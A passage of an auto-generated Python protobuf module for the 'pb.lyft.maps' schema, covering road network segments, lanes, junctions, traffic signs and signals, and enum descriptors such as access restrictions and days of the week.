\x01(\x0e\x32$.pb.lyft.maps.AccessRestriction.Type\"a\n\x04Type\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x12\n\x0eNO_RESTRICTION\x10\x01\x12\x0c\n\x08ONLY_HOV\x10\x02\x12\x0c\n\x08ONLY_BUS\x10\x03\x12\r\n\tONLY_BIKE\x10\x04\x12\r\n\tONLY_TURN\x10\x05\"\xaf\x02\n\x11\x44\x61ilyTimeInterval\x12\x45\n\x0f\x64\x61y_of_the_week\x18\x01 \x01(\x0e\x32,.pb.lyft.maps.DailyTimeInterval.DayOfTheWeek\x12 \n\x18start_local_time_seconds\x18\x02 \x01(\x05\x12\x1e\n\x16\x65nd_local_time_seconds\x18\x03 \x01(\x05\x12%\n\x1dtimezone_database_region_name\x18\x04 \x01(\t\"j\n\x0c\x44\x61yOfTheWeek\x12\n\n\x06SUNDAY\x10\x00\x12\n\n\x06MONDAY\x10\x01\x12\x0b\n\x07TUESDAY\x10\x02\x12\r\n\tWEDNESDAY\x10\x03\x12\x0c\n\x08THURSDAY\x10\x04\x12\n\n\x06\x46RIDAY\x10\x05\x12\x0c\n\x08SATURDAY\x10\x06\"C\n\x08Schedule\x12\x37\n\x0e\x64\x61ily_schedule\x18\x01 \x03(\x0b\x32\x1f.pb.lyft.maps.DailyTimeInterval\"]\n\tCondition\x12\x43\n\x18\x64\x61ily_temporal_condition\x18\x01 \x01(\x0b\x32\x1f.pb.lyft.maps.DailyTimeIntervalH\x00\x42\x0b\n\tcondition\"\xf8\x10\n\x12RoadNetworkSegment\x12+\n\x08vertices\x18\x01 \x03(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12*\n\nstart_node\x18\x02 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12(\n\x08\x65nd_node\x18\x03 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x42\n\x10\x66orward_lane_set\x18\x04 \x01(\x0b\x32(.pb.lyft.maps.RoadNetworkSegment.LaneSet\x12\x43\n\x11\x62\x61\x63kward_lane_set\x18\r \x01(\x0b\x32(.pb.lyft.maps.RoadNetworkSegment.LaneSet\x12\x1f\n\x17num_bidirectional_lanes\x18\x0f \x01(\x05\x12%\n\x05lanes\x18\x0c \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12+\n\x04name\x18\x05 \x03(\x0b\x32\x1d.pb.lyft.maps.LocalizedString\x12>\n\nroad_class\x18\x06 \x01(\x0e\x32*.pb.lyft.maps.RoadNetworkSegment.RoadClass\x12\x12\n\nis_private\x18\x0e \x01(\x08\x12\x14\n\x0cis_toll_road\x18\x11 \x01(\x08\x12J\n\x10travel_direction\x18\x07 \x01(\x0e\x32\x30.pb.lyft.maps.RoadNetworkSegment.TravelDirection\x12\x0f\n\x07z_level\x18\x08 \x01(\x11\x12%\n\x1dspeed_limit_meters_per_second\x18\t \x01(\x02\x12\x38\n0backward_direction_speed_limit_meters_per_second\x18\n \x01(\x02\x12,\n\x0crestrictions\x18\x0b \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x11\n\tdriveable\x18\x14 \x01(\x08\x12@\n\x08walkable\x18\x15 \x01(\x0e\x32..pb.lyft.maps.RoadNetworkSegment.SideOfSegment\x12\x45\n\x10\x66orward_bikeable\x18\x17 \x01(\x0e\x32+.pb.lyft.maps.RoadNetworkSegment.BikeAccess\x12\x46\n\x11\x62\x61\x63kward_bikeable\x18\x18 \x01(\x0e\x32+.pb.lyft.maps.RoadNetworkSegment.BikeAccess\x1a\xef\x02\n\x07LaneSet\x12\x19\n\x11num_driving_lanes\x18\x01 \x01(\x05\x12#\n\x1bnum_left_turn_driving_lanes\x18\x02 \x01(\x05\x12$\n\x1cnum_right_turn_driving_lanes\x18\x03 \x01(\x05\x12+\n#turn_descriptions_for_driving_lanes\x18\x04 \x01(\t\x12Q\n\x10\x62ike_lane_access\x18\x10 \x03(\x0e\x32\x37.pb.lyft.maps.RoadNetworkSegment.LaneSet.BikeLaneAccess\"~\n\x0e\x42ikeLaneAccess\x12\x17\n\x13UNKNOWN_BIKE_ACCESS\x10\x00\x12\x06\n\x02NO\x10\x01\x12\n\n\x06SHARED\x10\x02\x12\x0e\n\nDESIGNATED\x10\x03\x12\x18\n\x14\x44\x45SIGNATED_BACKWARDS\x10\x04\x12\x15\n\x11\x44\x45SIGNATED_SHARED\x10\x05\"\xbd\x03\n\tRoadClass\x12\x16\n\x12UNKNOWN_ROAD_CLASS\x10\x00\x12\x0c\n\x08MOTORWAY\x10\x01\x12\t\n\x05TRUNK\x10\x02\x12\x0b\n\x07PRIMARY\x10\x03\x12\r\n\tSECONDARY\x10\x04\x12\x0c\n\x08TERTIARY\x10\x05\x12\x0f\n\x0bRESIDENTIAL\x10\x06\x12\x10\n\x0cUNCLASSIFIED\x10\x07\x12\x0b\n\x07SERVICE\x10\x08\x12\x19\n\x15SERVICE_PARKING_AISLE\x10\t\x12\x14\n\x10SERVICE_DRIVEWAY\x10\n\x12\x11\n\rSERVICE_ALLEY\x10\x0b\x12\x1c\n\x18SERVICE_EMERGENCY_ACCESS\x10\x0c\x12\x19\n\x15SERVICE_DRIVE_THROUGH\x10\r\x12\x11\n\rMOTORWAY_LINK\x10\x0e\x12\x0e\n\nTRUNK_LINK\x10\x0f\x12\x10\n\x0cPRIMARY_LINK\x10\x10\x12\x12\n\x0eSECONDARY_LINK\x10\x11\x12\x11\n\rTERTIARY_LINK\x10\x12\x12\x19\n\x15SERVICE_LIVING_STREET\x10\x13\x12\x0e\n\nPEDESTRIAN\x10\x14\x12\x08\n\x04PATH\x10\x15\x12\t\n\x05STEPS\x10\x16\x12\x0c\n\x08\x43YCLEWAY\x10\x17\"\x7f\n\x0fTravelDirection\x12\x1c\n\x18UNKNOWN_TRAVEL_DIRECTION\x10\x00\x12\x0b\n\x07TWO_WAY\x10\x01\x12\x13\n\x0fONE_WAY_FORWARD\x10\x02\x12\x14\n\x10ONE_WAY_BACKWARD\x10\x03\x12\x16\n\x12ONE_WAY_REVERSIBLE\x10\x04\"\x8a\x01\n\rSideOfSegment\x12\x1b\n\x17UNKNOWN_SIDE_OF_SEGMENT\x10\x00\x12\x1a\n\x16\x45ITHER_SIDE_OF_SEGMENT\x10\x01\x12\x10\n\x0cSEGMENT_LEFT\x10\x02\x12\x11\n\rSEGMENT_RIGHT\x10\x03\x12\x1b\n\x17NEITHER_SIDE_OF_SEGMENT\x10\x04\"a\n\nBikeAccess\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x0f\n\x0bNOT_ALLOWED\x10\x01\x12\x0b\n\x07\x41LLOWED\x10\x02\x12\n\n\x06SHARED\x10\x03\x12\r\n\tDEDICATED\x10\x04\x12\r\n\tPROTECTED\x10\x05J\x04\x08\x16\x10\x17\"\xc4\x01\n\x08Junction\x12#\n\x1bis_non_trivial_intersection\x18\x04 \x01(\x08\x12\x32\n\x12road_network_nodes\x18\x01 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12%\n\x05lanes\x18\x03 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x38\n\x18traffic_control_elements\x18\x02 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\"\xd7\n\n\x04Lane\x12:\n\x1aparent_segment_or_junction\x18\x01 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12;\n\x12\x61\x63\x63\x65ss_restriction\x18\x0b \x01(\x0b\x32\x1f.pb.lyft.maps.AccessRestriction\x12W\n\x1dorientation_in_parent_segment\x18\x0c \x01(\x0e\x32\x30.pb.lyft.maps.RoadNetworkSegment.TravelDirection\x12\x41\n\x1cturn_type_in_parent_junction\x18\r \x01(\x0e\x32\x1b.pb.lyft.maps.Lane.TurnType\x12)\n\tgeo_frame\x18\x02 \x01(\x0b\x32\x16.pb.lyft.maps.GeoFrame\x12\x32\n\rleft_boundary\x18\x03 \x01(\x0b\x32\x1b.pb.lyft.maps.Lane.Boundary\x12\x33\n\x0eright_boundary\x18\x04 \x01(\x0b\x32\x1b.pb.lyft.maps.Lane.Boundary\x12+\n\x0blanes_ahead\x18\x05 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x39\n\x19\x61\x64jacent_lane_change_left\x18\x06 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12:\n\x1a\x61\x64jacent_lane_change_right\x18\x07 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x30\n\x10traffic_controls\x18\x08 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12.\n\x0eyield_to_lanes\x18\t \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x1c\n\x14\x63\x61n_have_parked_cars\x18\n \x01(\x08\x12%\n\x05tolls\x18\x0e \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x1a\xf2\x03\n\x08\x42oundary\x12\x1a\n\x12vertex_deltas_x_cm\x18\x01 \x03(\x11\x12\x1a\n\x12vertex_deltas_y_cm\x18\x02 \x03(\x11\x12\x1a\n\x12vertex_deltas_z_cm\x18\x03 \x03(\x11\x12=\n\x0c\x64ivider_type\x18\x04 \x03(\x0e\x32\'.pb.lyft.maps.Lane.Boundary.DividerType\x12\x1c\n\x14type_change_point_cm\x18\x05 \x03(\x05\"\xb4\x02\n\x0b\x44ividerType\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x08\n\x04NONE\x10\x01\x12\x17\n\x13SINGLE_YELLOW_SOLID\x10\x02\x12\x16\n\x12SINGLE_WHITE_SOLID\x10\x03\x12\x18\n\x14SINGLE_YELLOW_DASHED\x10\x04\x12\x17\n\x13SINGLE_WHITE_DASHED\x10\x05\x12\x17\n\x13\x44OUBLE_YELLOW_SOLID\x10\x06\x12\x16\n\x12\x44OUBLE_WHITE_SOLID\x10\x07\x12\'\n#DOUBLE_YELLOW_SOLID_FAR_DASHED_NEAR\x10\x08\x12\'\n#DOUBLE_YELLOW_DASHED_FAR_SOLID_NEAR\x10\t\x12\x0c\n\x08\x43URB_RED\x10\n\x12\x0f\n\x0b\x43URB_YELLOW\x10\x0b\x12\x08\n\x04\x43URB\x10\x0c\"f\n\x08TurnType\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x0b\n\x07THROUGH\x10\x01\x12\x08\n\x04LEFT\x10\x02\x12\x0e\n\nSHARP_LEFT\x10\x03\x12\t\n\x05RIGHT\x10\x04\x12\x0f\n\x0bSHARP_RIGHT\x10\x05\x12\n\n\x06U_TURN\x10\x06\"\xbd*\n\x15TrafficControlElement\x12+\n\tstop_sign\x18\x07 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12,\n\nyield_sign\x18\x08 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12I\n\tstop_line\x18/ \x01(\x0b\x32\x34.pb.lyft.maps.TrafficControlElement.AuxiliaryElementH\x00\x12I\n\rtraffic_light\x18\x1d \x01(\x0b\x32\x30.pb.lyft.maps.TrafficControlElement.TrafficLightH\x00\x12[\n\x16signal_flashing_yellow\x18\t \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12X\n\x13signal_flashing_red\x18\n \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12T\n\x0fsignal_red_face\x18\x0b \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12W\n\x12signal_yellow_face\x18\x0c \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12V\n\x11signal_green_face\x18\r \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12_\n\x1asignal_left_arrow_red_face\x18\x1e \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x62\n\x1dsignal_left_arrow_yellow_face\x18$ \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x61\n\x1csignal_left_arrow_green_face\x18\x1f \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12`\n\x1bsignal_right_arrow_red_face\x18 \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x63\n\x1esignal_right_arrow_yellow_face\x18% \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x62\n\x1dsignal_right_arrow_green_face\x18! \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x65\n signal_upper_left_arrow_red_face\x18& \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12h\n#signal_upper_left_arrow_yellow_face\x18\' \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12g\n\"signal_upper_left_arrow_green_face\x18( \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x66\n!signal_upper_right_arrow_red_face\x18) \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12i\n$signal_upper_right_arrow_yellow_face\x18* \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12h\n#signal_upper_right_arrow_green_face\x18+ \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12V\n\x11signal_red_u_turn\x18, \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12Y\n\x14signal_yellow_u_turn\x18- \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12X\n\x13signal_green_u_turn\x18. \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12,\n\nspeed_bump\x18\x0f \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12,\n\nspeed_hump\x18\" \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12W\n\x14pedestrian_crosswalk\x18\x10 \x01(\x0b\x32\x37.pb.lyft.maps.TrafficControlElement.PedestrianCrosswalkH\x00\x12\x31\n\x0fkeep_clear_zone\x18\x11 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12:\n\x18pedestrian_crossing_sign\x18\x12 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x33\n\x11signal_ahead_sign\x18\x13 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x33\n\x11no_left_turn_sign\x18\x14 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x34\n\x12no_right_turn_sign\x18\x15 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12?\n\x1dleft_turn_yield_on_green_sign\x18\x16 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x31\n\x0fno_parking_sign\x18\x17 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12.\n\x0cone_way_sign\x18\x18 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x32\n\x10school_zone_sign\x18\x19 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12.\n\x0cparking_zone\x18# \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x31\n\x0fspeed_bump_sign\x18\x1b \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x33\n\x11\x63onstruction_zone\x18\x31 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12@\n\x1estop_here_for_pedestrians_sign\x18\x32 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12Q\n/state_law_stop_for_pedestrian_in_crosswalk_sign\x18\x33 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x41\n\x1fyield_here_for_pedestrians_sign\x18\x34 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12L\n*turning_vehicles_yield_to_pedestrians_sign\x18\x35 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x45\n#state_law_yield_for_pedestrian_sign\x18\x36 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x43\n!railroad_crossing_regulatory_sign\x18\x37 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12@\n\x1erailroad_crossing_warning_sign\x18\x38 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12>\n\x1crailroad_crossing_other_sign\x18\x39 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12=\n\x1broundabout_circulation_sign\x18: \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12=\n\x1broundabout_directional_sign\x18; \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x37\n\x15roundabout_other_sign\x18< \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12:\n\x18no_left_turn_on_red_sign\x18= \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12;\n\x19no_right_turn_on_red_sign\x18> \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x35\n\x13no_turn_on_red_sign\x18? \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x33\n\x11\x64o_not_enter_sign\x18@ \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x30\n\x0eno_u_turn_sign\x18\x41 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x39\n\x17no_left_and_u_turn_sign\x18\x42 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12:\n\x18no_straight_through_sign\x18\x43 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x35\n\x13left_turn_only_sign\x18\x44 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x36\n\x14right_turn_only_sign\x18\x45 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x32\n\x10u_turn_only_sign\x18\x46 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12<\n\x1astraight_through_only_sign\x18G \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12=\n\x1bother_turn_restriction_sign\x18H \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x38\n\x16\x63onstruction_zone_sign\x18I \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12)\n\tgeo_frame\x18\x02 \x01(\x0b\x32\x16.pb.lyft.maps.GeoFrame\x12\x1a\n\x12points_x_deltas_cm\x18\x03 \x03(\x11\x12\x1a\n\x12points_y_deltas_cm\x18\x04 \x03(\x11\x12\x1a\n\x12points_z_deltas_cm\x18\x05 \x03(\x11\x12G\n\rgeometry_type\x18\x30 \x01(\x0e\x32\x30.pb.lyft.maps.TrafficControlElement.GeometryType\x12\x34\n\x10\x63ontrolled_paths\x18\x06 \x03(\x0b\x32\x1a.pb.lyft.maps.LaneSequence\x1ar\n\x13PedestrianCrosswalk\x12.\n\x0etraffic_lights\x18\x01 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12+\n\x0byield_lines\x18\x02 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x1aT\n\x10\x41uxiliaryElement\x12@\n primary_traffic_control_elements\x18\x01 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x1a\xae\x02\n\x15TrafficLightFaceState\x12_\n\x13yield_rules_when_on\x18\x01 \x03(\x0b\x32\x42.pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet\x12\x1c\n\x14no_right_turn_on_red\x18\x02 \x01(\x08\x1a\x95\x01\n\x08YieldSet\x12$\n\x04lane\x18\x01 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12.\n\x0eyield_to_lanes\x18\x02 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x33\n\x13yield_to_crosswalks\x18\x03 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x1a;\n\x0cTrafficLight\x12+\n\x0b\x66\x61\x63\x65_states\x18\x03 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\"S\n\x0cGeometryType\x12\n\n\x06UKNOWN\x10\x00\x12\t\n\x05POINT\x10\x01\x12\x0f\n\x0bMULTI_POINT\x10\x02\x12\x0e\n\nLINESTRING\x10\x03\x12\x0b\n\x07POLYGON\x10\x04\x42\x06\n\x04TypeJ\x04\x08\x0e\x10\x0f\"\x90\x03\n\x0fSegmentSequence\x12\x30\n\x04type\x18\x01 \x01(\x0e\x32\".pb.lyft.maps.SegmentSequence.Type\x12\x46\n\x08segments\x18\x02 \x03(\x0b\x32\x34.pb.lyft.maps.SegmentSequence.SegmentWithOrientation\x1a\xcf\x01\n\x16SegmentWithOrientation\x12\'\n\x07segment\x18\x01 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12U\n\x0borientation\x18\x02 \x01(\x0e\x32@.pb.lyft.maps.SegmentSequence.SegmentWithOrientation.Orientation\"5\n\x0bOrientation\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x0b\n\x07\x46ORWARD\x10\x01\x12\x0c\n\x08\x42\x41\x43KWARD\x10\x02\"1\n\x04Type\x12\x0b\n\x07UNKNOWN\x10\x00\x12\r\n\tFORBIDDEN\x10\x01\x12\r\n\tMANDATORY\x10\x02\"5\n\x0cLaneSequence\x12%\n\x05lanes\x18\x01 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\"C\n\rLaneSequences\x12\x32\n\x0elane_sequences\x18\x01 \x03(\x0b\x32\x1a.pb.lyft.maps.LaneSequence\"b\n\x07Polygon\x12\x31\n\x0eshell_vertices\x18\x01 \x03(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12$\n\x05holes\x18\x02 \x03(\x0b\x32\x15.pb.lyft.maps.Polygon\"7\n\x0cMultiPolygon\x12\'\n\x08polygons\x18\x01 \x03(\x0b\x32\x15.pb.lyft.maps.Polygon\"\xf1\x05\n\x0e\x41nnotatedShape\x12+\n\x04name\x18\x01 \x03(\x0b\x32\x1d.pb.lyft.maps.LocalizedString\x12\x30\n\x0cmultipolygon\x18\x02 \x01(\x0b\x32\x1a.pb.lyft.maps.MultiPolygon\x12\x39\n\x08\x62uilding\x18\x03 \x01(\x0b\x32%.pb.lyft.maps.AnnotatedShape.BuildingH\x00\x12\x35\n\x06region\x18\x04 \x01(\x0b\x32#.pb.lyft.maps.AnnotatedShape.RegionH\x00\x12\'\n\x05venue\x18\x05 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x39\n\x17\x61\x64ministrative_boundary\x18\x06 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12&\n\x04park\x18\x07 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x38\n\x16\x64rivable_surface_prior\x18\x08 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x1a\xa5\x02\n\x08\x42uilding\x12\x38\n\x04type\x18\x01 \x01(\x0e\x32*.pb.lyft.maps.AnnotatedShape.Building.Type\x12\x15\n\rheight_meters\x18\x02 \x01(\x05\x12\x1b\n\x13\x61\x62ove_ground_floors\x18\x03 \x01(\x05\"\xaa\x01\n\x04Type\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x0e\n\nCOMMERCIAL\x10\x01\x12\x0f\n\x0bRESIDENTIAL\x10\x02\x12\x12\n\x0eTRANSPORTATION\x10\x03\x12\x0c\n\x08HOSPITAL\x10\x04\x12\t\n\x05\x45VENT\x10\x05\x12\x15\n\x11PARKING_STRUCTURE\x10\x06\x12\r\n\tRELIGIOUS\x10\x07\x12\x0f\n\x0b\x45\x44UCATIONAL\x10\x08\x12\x10\n\x0cGOVERNMENTAL\x10\t\x1a\x18\n\x06Region\x12\x0e\n\x06source\x18\x01 \x01(\tB\x06\n\x04Type\"i\n\tLatLngBox\x12-\n\nsouth_west\x18\x01 \x01(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12-\n\nnorth_east\x18\x02 \x01(\x0b\x32\x19.pb.lyft.maps.GeoLocation\"\xe8\x06\n\nMapElement\x12\"\n\x02id\x18\x01 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x31\n\x07\x65lement\x18\x02 \x01(\x0b\x32 .pb.lyft.maps.MapElement.Element\x12-\n\x0c\x62ounding_box\x18\x03 \x01(\x0b\x32\x17.pb.lyft.maps.LatLngBox\x12L\n\x15\x61ssociated_conditions\x18\x05 \x03(\x0b\x32-.pb.lyft.maps.MapElement.AssociatedConditions\x12;\n\ndebug_info\x18\x06 \x03(\x0b\x32\'.pb.lyft.maps.MapElement.DebugInfoEntry\x12\x16\n\x0eservice_region\x18\x07 \x01(\t\x1a\x84\x03\n\x07\x45lement\x12\x33\n\x07segment\x18\x01 \x01(\x0b\x32 .pb.lyft.maps.RoadNetworkSegmentH\x00\x12-\n\x04node\x18\x02 \x01(\x0b\x32\x1d.pb.lyft.maps.RoadNetworkNodeH\x00\x12\"\n\x04lane\x18\x03 \x01(\x0b\x32\x12.pb.lyft.maps.LaneH\x00\x12\x46\n\x17traffic_control_element\x18\x04 \x01(\x0b\x32#.pb.lyft.maps.TrafficControlElementH\x00\x12*\n\x08junction\x18\x05 \x01(\x0b\x32\x16.pb.lyft.maps.JunctionH\x00\x12\x39\n\x10segment_sequence\x18\x06 \x01(\x0b\x32\x1d.pb.lyft.maps.SegmentSequenceH\x00\x12\x37\n\x0f\x61nnotated_shape\x18\x08 \x01(\x0b\x32\x1c.pb.lyft.maps.AnnotatedShapeH\x00\x42\t\n\x07\x65lement\x1ax\n\x14\x41ssociatedConditions\x12+\n\nconditions\x18\x01 \x03(\x0b\x32\x17.pb.lyft.maps.Condition\x12\x33\n\toverrides\x18\x02 \x01(\x0b\x32 .pb.lyft.maps.MapElement.Element\x1a\x30\n\x0e\x44\x65\x62ugInfoEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"G\n\x0bMapFragment\x12\x0c\n\x04name\x18\x01 \x01(\t\x12*\n\x08\x65lements\x18\x02 \x03(\x0b\x32\x18.pb.lyft.maps.MapElementB\x06Z\x04mapsb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_descriptor__pb2.DESCRIPTOR,google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,])
_ACCESSRESTRICTION_TYPE = _descriptor.EnumDescriptor(
name='Type',
full_name='pb.lyft.maps.AccessRestriction.Type',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NO_RESTRICTION', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONLY_HOV', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONLY_BUS', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONLY_BIKE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONLY_TURN', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=587,
serialized_end=684,
)
_sym_db.RegisterEnumDescriptor(_ACCESSRESTRICTION_TYPE)
_DAILYTIMEINTERVAL_DAYOFTHEWEEK = _descriptor.EnumDescriptor(
name='DayOfTheWeek',
full_name='pb.lyft.maps.DailyTimeInterval.DayOfTheWeek',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='SUNDAY', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MONDAY', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TUESDAY', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='WEDNESDAY', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='THURSDAY', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FRIDAY', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SATURDAY', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=884,
serialized_end=990,
)
_sym_db.RegisterEnumDescriptor(_DAILYTIMEINTERVAL_DAYOFTHEWEEK)
_ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS = _descriptor.EnumDescriptor(
name='BikeLaneAccess',
full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.BikeLaneAccess',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_BIKE_ACCESS', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NO', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
